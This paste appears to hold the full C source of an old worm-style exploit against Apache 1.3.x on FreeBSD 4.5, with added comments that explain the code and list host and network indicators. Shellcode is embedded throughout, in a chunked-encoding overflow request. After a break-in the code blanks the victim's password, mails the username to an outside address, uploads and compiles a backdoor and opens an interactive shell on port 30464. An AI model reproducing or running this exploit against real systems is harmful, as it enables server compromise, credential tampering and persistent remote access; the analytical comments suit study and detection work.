
Worm.FreeBSD.Block - Source Code

Jul 8th, 2023
  1. /**************************************************************************
  2.  
  3. Freebsd apache exploit inspirated to me by apache-worm.c
  4. published on http://packetstormsecurity.nl.Here is how it
  5. works:
  6. 1)Get blackhole.c from packetstorm and set it on port 30464.
  7.  Just change it's default port from the source.
  8. 2) Copy it in /tmp/.blackhole.c
  9.  
  10.  cp blackhole.c /tmp/.blackhole.c
  11.  
  12. 3) Check this source,compile it and run it ./apache-ex <Ip>
  13. If everything works fine you will be connected to a shell on 30464,
  14. then use another exploit to get root.
  15.  
  16. If you have any flames and comment send them to me at <nebunu@home.ro>
  17. Also check the worm source too.
  18.  
  19. **************************************************************************/
  20.  
  21.  
  22. #include <stdio.h>
  23. #include <unistd.h>
  24. #include <string.h>
  25. #include <fcntl.h>
  26. #include <stdlib.h>
  27. #include <stdarg.h>
  28. #include <sys/ioctl.h>
  29. #include <sys/types.h>
  30. #include <sys/socket.h>
  31. #include <netinet/in.h>
  32. #include <sys/time.h>
  33. #include <unistd.h>
  34. #include <errno.h>
  35. #include <netdb.h>
  36. #include <arpa/telnet.h>
  37. #include <rpc/rpc.h>
  38. #include <sys/wait.h>
  39. #include <signal.h>
  40.  
/* Socket descriptor of the post-exploitation shell: assigned in main(),
 * consumed by pulamea(). conectare() declares a local of the same name. */
int pizda;
/* sendch() returns the write() result; anything <= ASUCCESS makes encode()
 * stop sending. */
#define ASUCCESS         0
/* Value placed in the Host: header of the crafted POST built by exploit(). */
#define HOST_PARAM  "Unknown"
/* Not referenced anywhere on this page. */
#define RET_ADDR_INC    512
/* Lengths of the three filler runs used in the crafted request:
 * PADSIZE_1 in the return-address header names, PADSIZE_2 as the first
 * chunk body, PADSIZE_3 in the shellcode header names. */
#define PADSIZE_1   4
#define PADSIZE_2   5
#define PADSIZE_3   7
/* Number of return-address ("populator") headers and of shellcode headers
 * exploit() appends to the request. */
#define REP_POPULATOR   24
#define REP_SHELLCODE   24
/* Count of NOP bytes written ahead of every shellcode copy. NOP is 0x41,
 * i.e. a run of 'A' characters on the wire. */
#define NOPCOUNT    1024
#undef NOP
#define NOP     0x41
/* Fill characters matching PADSIZE_1 / PADSIZE_2 / PADSIZE_3. */
#define PADDING_1   'A'
#define PADDING_2   'B'
#define PADDING_3   'C'
/* Append helpers used inside exploit(): both write at the caller's cursor
 * variable named p and advance it. Neither checks remaining space; exploit()
 * sizes the destination buffer up front from the same constants. Each macro
 * expands to two statements, so it must not be the body of an unbraced if. */
#define PUT_STRING(s)   memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
/* Machine-code payload. exploit() copies it verbatim (sizeof - 1 bytes,
 * without the terminating NUL) into each of the REP_SHELLCODE headers,
 * after NOPCOUNT NOP bytes. Its internal behaviour is not documented on this
 * page and is treated as opaque here. */
char shellcode[] =
  "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
  "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
  "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
  "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
  "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
  "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
  "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
  "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
  "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
  "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
  "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
  "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
  "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
  "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
  "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
; /* stray empty declaration, present in the original */
 
/* Per-target parameters consumed by exploit():
 *  type       - human-readable label; not printed by the code on this page
 *               (main() hard-codes its own list).
 *  delta      - emitted with %x as the final chunk-size field of the
 *               request; negative in both entries.
 *  retaddr    - written little-endian, repretaddr times, into each
 *               populator header.
 *  repzero    - number of NUL bytes that follow the addresses in each
 *               populator header.
 * victim receives a memcpy() of whichever entry is being tried. */
struct {
char *type;
int delta;
u_long retaddr;
int repretaddr;
int repzero;
} targets[] = {
        { "FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)",      -146,  0xbfbfde00,6, 36 },
        { "FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)",   -134,  0xbfbfdb00,3, 36 },
}, victim;
  86.  
  87.  
  88.  
/* Open a plain TCP connection to ip:port.
 *
 * ip    dotted-quad string, parsed with inet_addr() (no hostname lookup).
 * port  host-order port number.
 *
 * Returns the connected descriptor, or -1 if connect() fails. A socket()
 * failure is treated as fatal and exits the process. The local variable
 * shadows the global 'pizda'; only the return value reaches the caller
 * (main() stores it into the global itself). The sockaddr_in is not zeroed
 * before use; only the three fields below are set. */
int conectare(char *ip, int port)
{
struct sockaddr_in addr;
int pizda;
pizda = socket(AF_INET, SOCK_STREAM, 0);
if(pizda == -1)
{
perror("socket()");
exit(-1);
}
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
if(connect(pizda,(struct sockaddr *)&addr,sizeof(struct sockaddr_in)) == -1)
return -1;
return(pizda);
}
  106.  
  107.  
  108.  
/* Interactive relay between the terminal and the remote shell on 'pizda'.
 *
 * Immediately sends "id; uname -a\n" as a first command, then loops on
 * select(): data arriving from the socket is printed to stdout, data typed
 * on stdin is forwarded to the socket unchanged. Everything travels as
 * unencrypted plain text over the TCP connection. The function only
 * returns through exit(0), when read() on the socket reports closure or an
 * error. The 'pizda' parameter shadows the global of the same name. */
void pulamea(int pizda)
{
int             n;
char            recvbuf[1024], *cmd = "id; uname -a\n";
fd_set          rset;
/* first command issued on the remote side; its output is shown below */
send(pizda, cmd, strlen(cmd), 0);
while (1)
{
FD_ZERO(&rset);
FD_SET(pizda, &rset);
FD_SET(STDIN_FILENO, &rset);
/* nfds is pizda+1; this assumes the socket descriptor is larger than 0 */
select(pizda+1, &rset, NULL, NULL, NULL);
if(FD_ISSET(pizda, &rset))
{
n = read(pizda, recvbuf, 1024);
if (n <= 0)
{
printf("Connection closed by foreign host!\n");
exit(0);
}
recvbuf[n] = 0;
printf("%s", recvbuf);
}
if (FD_ISSET(STDIN_FILENO, &rset))
{
n = read(STDIN_FILENO, recvbuf, 1024);
if (n > 0)
{
recvbuf[n] = 0;
write(pizda, recvbuf, n);
}
}
}
return;
}
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
/* Trim newline, carriage-return and space characters from both ends of
 * buf, in place. Used by GetAddress() on the extracted Server: header
 * value before it is duplicated and returned. The first loop chops
 * trailing characters; the second is intended to shift the string left by
 * one position for every leading whitespace character. */
void cleanup(char *buf)
{
while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
unsigned long i;
for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i];
}
}
  159.  
  160.  
/* Banner-grab the HTTP service on ip:80 and return its Server: header.
 *
 * Sends "GET / HTTP/1.1\r\n\r\n" (no Host header), waits up to 15 s for
 * the first chunk of the response, and scans at most 1023 bytes for the
 * literal "Server: ". The value up to the first '\n' is trimmed with
 * cleanup() and returned as a malloc'd copy; the caller owns it (exploit()
 * frees it). Returns NULL if connect() fails, read() fails, select()
 * times out, or no Server: header is found. The socket is never closed on
 * any path, and the socket() result is not checked.
 *
 * Log/network indicator: a Host-less HTTP/1.1 GET for "/" followed at once
 * by the large POST that exploit() sends to the same host. */
char *GetAddress(char *ip) {
struct sockaddr_in sin;
fd_set fds;
int n,d,sock;
char buf[1024];
struct timeval tv;
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds))
{
/* single read; whatever arrived first is all that is examined */
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
char *start=buf+d+strlen("Server: ");
/* terminate the value at the end of its header line */
for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
cleanup(start);
return strdup(start);
}
}
}
return NULL;
}
  192.  
/* uuencode character mapping: a 6-bit value v becomes the printable byte
 * ' ' + v, except that zero is written as '`' instead of a space. Used by
 * encode() for every output character. */
#define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
  194.  
/* Write one byte of uuencoded output to sock.
 *
 * '`', '\\' and '$' are preceded by a backslash: the stream is later fed
 * to a shell through an unquoted here-document (see the "cat > ... <<
 * __eof__" command in exploit()), where those characters would otherwise
 * be interpreted by the shell rather than stored. Returns the result of
 * the final write(), or the failed result of the escape write if that
 * returned <= 0. */
int sendch(int sock,int buf) {
char a[2];
int b=1;
if (buf == '`' || buf == '\\' || buf == '$') {
a[0]='\\';
a[1]=0;
b=write(sock,a,1);
}
if (b <= 0) return b;
a[0]=buf;
a[1]=0;
return write(sock,a,1);
}
  208.  
/* Write a NUL-terminated string to sock in one write() call and return
 * write()'s result. Thin wrapper used for the command lines exploit()
 * pushes to the remote shell; no retry on short writes. */
int writem(int sock, char *str) {
return write(sock,str,strlen(str));
}
  212.  
/* Stream the local file /tmp/.blackhole.c to descriptor 'a' as uuencode text.
 *
 * Output is a "begin 655 .blackhole.c" header, one encoded line per 45 input
 * bytes (length character, then 4 output characters per 3 input bytes via
 * ENC()/sendch()), a terminating line for length zero, and "end". The
 * octal masks 060/017/074/03/077 are the usual uuencode 6-bit splitting.
 *
 * Returns 0 if the file cannot be opened or ferror() is set after the
 * loop, 1 otherwise. A failed sendch() only breaks out of the current
 * loop; the trailer is still sent and 1 is returned.
 *
 * Defender note: on the target this stream is written to /tmp/.uublackhole
 * and decoded back to /tmp/.blackhole.c by the uudecode command exploit()
 * issues, so both paths are host-side artefacts of this tool. */
int encode(int a) {
register int ch, n;
register char *p;
char buf[80];
FILE *in;
if ((in=fopen("/tmp/.blackhole.c","r")) == NULL) return 0;
writem(a,"begin 655 .blackhole.c\n");
while ((n = fread(buf, 1, 45, in))) {
/* line starts with the encoded byte count */
ch = ENC(n);
if (sendch(a,ch) <= ASUCCESS) break;
for (p = buf; n > 0; n -= 3, p += 3) {
/* pad a trailing partial group with NULs */
if (n < 3)
{
p[2] = '\0';
if (n < 2) p[1] = '\0';
}
ch = *p >> 2;
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017);
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03);
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
ch = p[2] & 077;
ch = ENC(ch);
if (sendch(a,ch) <= ASUCCESS) break;
}
ch='\n';
if (sendch(a,ch) <= ASUCCESS) break;
/* brief pause between lines */
usleep(10);
}
if (ferror(in)) {
fclose(in);
return 0;
}
/* zero-length line then "end" close the uuencode block */
ch = ENC('\0');
sendch(a,ch);
ch = '\n';
sendch(a,ch);
writem(a,"end\n");
if (in) fclose(in);
return 1;
}
  258.  
/* Attack driver for a single host, documented here for analysis/detection.
 *
 * 1. Fingerprint: GetAddress() must return a Server: value beginning with
 *    "Apache"; otherwise the process exits. alarm(60) bounds the whole
 *    attempt - no SIGALRM handler is installed on this page, so the default
 *    action terminates the process.
 * 2. For each of the two targets[] entries: connect to port 80 and send ONE
 *    POST request consisting of
 *      - "POST / HTTP/1.1" with "Host: Unknown",
 *      - REP_SHELLCODE headers named "X-" + PADSIZE_3 'C's, each carrying
 *        NOPCOUNT 'A' bytes followed by the shellcode[] bytes,
 *      - REP_POPULATOR headers named "X-" + PADSIZE_1 'A's, each carrying
 *        victim.retaddr little-endian repretaddr times plus repzero NULs,
 *      - "Transfer-Encoding: chunked", a PADSIZE_2-byte chunk of 'B', and a
 *        final chunk-size field holding victim.delta printed with %x
 *        (negative in both table entries).
 * 3. Read replies with a 15 s select() per pass; a select() timeout just
 *    loops again, so only the alarm ends an unresponsive attempt. Two
 *    consecutive 'G' bytes are treated as success (presumably emitted by the
 *    payload - not shown on this page). The tool then answers "O", extends
 *    the alarm to an hour, sleeps 10 s and pushes shell commands over the
 *    same socket:
 *      - blank the current account's password and mail the user name out
 *        (passwd -d / mail to email@youraddress.com),
 *      - write encode()'s uuencode stream to /tmp/.uublackhole via an
 *        unquoted here-document,
 *      - uudecode it to /tmp/.blackhole.c, compile with gcc to
 *        /tmp/.blackhole, chmod +x, execute it, exit.
 *    It drains the socket and exits the process.
 * 4. On a non-matching attempt the buffer is freed, the socket closed, and
 *    the next table entry is tried.
 *
 * Host-side artefacts: /tmp/.uublackhole, /tmp/.blackhole.c, /tmp/.blackhole,
 * passwd/uudecode/gcc invocations from the web server's account, and
 * outbound mail. Network-side: a Host-less GET then a POST with dozens of
 * "X-CCCCCCC:"/"X-AAAA:" headers and chunked encoding, later a connection
 * to port 30464 from main(). */
void exploit(char *ip) {
char *a=GetAddress(ip);
int l,sock;
struct sockaddr_in sin;
if (a == NULL) exit(0);
if (strncmp(a,"Apache",6)) exit(0);
free(a);
alarm(60);
for (l=0;l<2;l++) {
u_char buf[512], *expbuf=0, *p=0;
int i=0, j=0, responses=0;
memcpy(&victim, &targets[l], sizeof(victim));
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) exit(1);
/* buffer sized from the same constants the PUT_* macros consume below */
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR));
PUT_STRING("POST / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
/* shellcode-carrying headers */
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("\r\n");
}
/* return-address headers */
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < victim.repretaddr; j++) {
*p++ = victim.retaddr & 0xff;
*p++ = (victim.retaddr >> 8) & 0xff;
*p++ = (victim.retaddr >> 16) & 0xff;
*p++ = (victim.retaddr >> 24) & 0xff;
}
PUT_BYTES(victim.repzero, 0);
PUT_STRING("\r\n");
}
/* chunked body: one chunk of 'B's, then victim.delta as the next size */
PUT_STRING("Transfer-Encoding: chunked\r\n");
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval  tv;
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break;
if(n >= 1)
{
/* count consecutive 'G' bytes; any other byte resets the count */
for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0;
if(responses >= 2) {
write(sock,"O",1);
alarm(3600);
sleep(10);
/* post-exploitation commands sent to the remote shell */
writem(sock,"\npasswd -d `whoami`;echo `whoami` | mail email@youraddress.com\n");
writem(sock,"\nrm -rf /tmp/.blackhole.c;cat > /tmp/.uublackhole << __eof__;\n");
encode(sock);
writem(sock,"__eof__\n");
sprintf(buf,"/usr/bin/uudecode -o /tmp/.blackhole.c /tmp/.uublackhole;gcc -o /tmp/.blackhole /tmp/.blackhole.c;chmod +x /tmp/.blackhole;/tmp/.blackhole;exit;\n");
writem(sock,buf);
/* drain until the remote side closes or read() fails */
while(read(sock,buf,1024)>=0);
exit(0);
}
}
}
}
free(expbuf);
close(sock);
}
return;
}
  343.  
  344.  
/* Entry point: ./apache-ex <IP>.
 *
 * With no argument (or more than one) it prints the hard-coded target list
 * and usage text and exits. Otherwise it runs exploit() against argv[1],
 * sleeps 3 s, connects to port 30464 on the same host - the port on which
 * the dropped /tmp/.blackhole is expected to listen, per the header
 * comment on this page - and hands the socket to pulamea() for an
 * interactive session. The result of conectare() (possibly -1) is stored
 * in the global 'pizda' without being checked. Declared without a return
 * type and with 'char **argv[]', as in the original paste. */
main(int argc,char **argv[])
 
{
if (argc!=2)
{
printf("AVAILABLE TARGETS:\n
1)   FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)      
2)   FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
 
 
 Adapted after a apache worm by
 nebunu <nebunu@home.ro>
 
 Usage: ./apache-ex <IP>
\n\n");
exit(0);
}
printf("Exploiting %s , nebunu rulez!\n..",argv[1]);
exploit(argv[1]);
sleep(3);
printf("Connecting to shell on port 30464\n...");
pizda=conectare(argv[1],30464);
pulamea(pizda);
}
Tags: freebsd worm